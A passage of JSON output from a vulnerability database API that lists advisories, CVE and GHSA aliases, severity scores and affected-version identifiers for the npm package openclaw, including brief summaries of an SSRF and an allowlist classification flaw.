D-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["CVE-2026-31997","GHSA-q399-23r3-hfx4"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pcea-jxne-vygc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50495?format=json","vulnerability_id":"VCID-rwgg-8hg2-5kd6","summary":"OpenClaw has web_search citation redirect SSRF via private-network-allowing policy\nGemini `web_search` citation redirect resolution used a private-network-allowing SSRF policy. A citation URL redirect could target loopback/private/internal destinations and be fetched by the gateway.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31989","reference_id":"","reference_type":"","scores":[{"value":"0.00062","scoring_system":"epss","scoring_elements":"0.19595","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00062","scoring_system":"epss","scoring_elements":"0.19638","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00062","scoring_system":"epss","scoring_elements":"0.19643","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31989"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-web-search-citation-redirect","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-19T13:38:55Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-web-search-citation-redirect"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31989","reference_id":"CVE-2026-31989","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31989"},{"reference_url":"https://github.com/advisories/GHSA-g99v-8hwm-g76g","reference_id":"GHSA-g99v-8hwm-g76g","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g99v-8hwm-g76g"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g99v-8hwm-g76g","reference_id":"GHSA-g99v-8hwm-g76g","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-19T13:38:55Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g99v-8hwm-g76g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["CVE-2026-31989","GHSA-g99v-8hwm-g76g"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rwgg-8hg2-5kd6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50489?format=json","vulnerability_id":"VCID-s66b-8pbe-2kb4","summary":"OpenClaw: Unicode canonicalization drift in node metadata policy classification could broaden node allowlists\nA paired node could supply Unicode-confusable `platform` or `deviceFamily` metadata that passed metadata pinning but classified differently for command policy resolution, broadening default node command allowlists.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/advisories/GHSA-392f-ggf5-fp3c","reference_id":"GHSA-392f-ggf5-fp3c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-392f-ggf5-fp3c"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-392f-ggf5-fp3c","reference_id":"GHSA-392f-ggf5-fp3c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-392f-ggf5-fp3c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"